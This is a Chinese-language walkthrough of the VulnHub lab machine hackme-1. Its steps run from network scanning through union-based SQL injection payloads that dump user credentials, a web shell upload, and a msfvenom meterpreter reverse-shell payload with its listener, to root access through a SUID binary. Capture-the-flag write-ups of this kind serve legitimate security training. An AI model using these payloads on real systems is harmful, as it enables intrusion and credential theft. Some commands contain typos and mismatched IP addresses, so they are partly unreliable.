下载地址:https://www.vulnhub.com/entry/hackme-1,330/测试机系统:kali、win10
测试机IP:192.168.3.140
kali:192.168.3.136
一、信息收集
1.主机发现
netdiscover -r 192.168.28.0/24
发现靶机IP:192.168.3.140
2.端口扫描
masscan --rate=100000 -p 0-65535 192.168.3.140
3.服务扫描
nmap -T4 -sV -O -p 22,80 192.168.3.140
4.目录扫描
gobuster dir -e -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,zip,html -u http://192.168.3.140 -t 30
5.访问目录扫描出的网站
访问http://192.168.3.140/login.php
注册一个账号 admin/111111 登录进来
二、漏洞探测
1.查看是否存在sql注入
登录进去之后有一个查询框,点击查询框出现所有信息
输入 OSINT' and 1=1# #说明存在sql注入
sql注入
OSINT' order by 3# #判断字段
OSINT' order by 4# #没有回显 说明字段数为3
-1' union select database(),2,3# #查库名 得到数据库名称为webapphacking
-1' union select group_concat(table_name),2,3 from information_schema.tables where table_schema='webapphacking'# 查看webapphacking中所有的表
得到数据库中存在books表和users表;猜测users表包含账户信息 :
-1' union select group_concat(column_name),2,3 from information_schema.columns where table_name='users'#
查看users表所有的列
-1' union select group_concat(user),group_concat(pasword),3 from users#
这里需要用MD5 解密
#登录管理员账号 发现存在文件上传
直接上传图片马 ,使用蚁剑连接
3.上传木马文件
kali里MSF生成木马文件
msfvenom -p linux/x64/meterpreter/reverse_tcp lhost=192.168.28.137 lport=4444 -f elf >4444.elf
4.监听
msfconsole
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set lhost 192.168.28.137 #目标靶机IP
set lport 4444
explort
随后在中国蚁剑木马文件的目录下打开终端,设置木马文件的权限并运行文件(如果没有设置权限就会出现下图第一次运行文件时的情况:提示权限不足)
chomd +x 4444.elf
./4444.elf
返回kali,可以看到监听成功
四、提权
shell #在meterpreter>下
whoami #显示用户 #这个时候还是普通用户
2.切换终端
获取shell后切换到python终端
python -c 'import pty;pty.spawn("/bin/bash")'
获取root权限
在home目录下发现文件touchmenot,切换到对应路径下,然后运行文件
cd home/legacy
./touchmenot
运行后就获得了root权限。